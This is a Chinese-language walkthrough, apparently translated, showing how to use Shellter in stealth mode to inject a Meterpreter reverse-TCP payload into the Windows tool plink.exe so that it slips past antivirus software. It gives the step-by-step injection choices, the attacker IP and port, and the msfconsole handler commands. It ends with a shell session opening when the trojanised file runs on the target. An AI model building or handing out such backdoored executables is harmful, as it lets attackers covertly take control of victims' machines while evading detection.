或许你还在为无法绕过反病毒软件获得Meterpreter shell而懊恼,试试Shellter 5.1吧。 首先需要获取一个正常的Windows exe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。Shellter有一个自动模式,该模式会使整个操作过程变得十分的简单。在这篇文章中,我使用Kali 2.0作为主机,另外一台Windows作为靶机。 0×01 磨刀:
Kali中不包含最新版本的Shellter,如果要获取最新版本需要下载、解压ZIP文件。 1.下载安装shellter https://www.shellterproject.com/download/
原文作者把下载下来的文件保存在了/root/Desktop 目录。 2.从Kali系统的“/usr/share/windows-binaries”目录中找到“plink.exe”,然后将其拷贝至Shellter的文件夹中。 3.切换到 /root/Desktop/shellter 目录
0×02 砍柴:
4.从终端启动shellter wine shellter.exe[/url] 5.键入“A”启用自动模式:
6.在提示PE目标时,输入:“plink.exe” 7.当询问是否启用隐身模式时输入:“Y” [url=http://image.3001.net/images/20151019/14452365895114.png!small] 在隐身模式新功能下,后门文件仍然具有原始文件的功能。 8.当提示输入Payloads时选择“L”然后选择“1” Meterpreter_Reverse_TCP [/url] 9.输入Kali主机的IP(原文作者使用192.168.1.39) 10.输入程序要使用的端口(原文作者使用4545) [url=http://image.3001.net/images/20151019/1445237270932.png!small] Shellter将会在plink.exe中注入shellcode,这时你可能需要稍等一会儿。然后,你就可以看到: [/url] 这时你会在Shellter目录发现两个文件:‘plink.exe’(这个是被注入shellcode的后门文件)‘plink.exe.bak’(这个是原来的正常文件) 11.现在,我们需要在Kali系统中使用和之前相同的一些参数启动一个监听服务 msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.1.39set lport 4545exploit[url=http://image.3001.net/images/20151019/14452388988160.png!small] 12.把‘plink.exe’复制到Windows系统 [/url] 13.如果你在Windows系统里面运行plink.exe [url=http://image.3001.net/images/20151019/14452392654258.png!small] 这里列出了一些帮助信息,但这个操作并不会触发远程shell,但是当我们用plink进行远程登录的时候(这里登陆的是树莓派)如下图所示: [/url] 请注意,我们通过plink得到树莓派ssh的登录提示,同时,在kali中Metasploit也得到了一个session: [url=http://image.3001.net/images/20151019/14452398877021.png!small] 0×03 getshell
这时可以执行sysinfo获得靶机的一些系统信息: [url=http://image.3001.net/images/20151019/14452399695928.png!small][/url]
|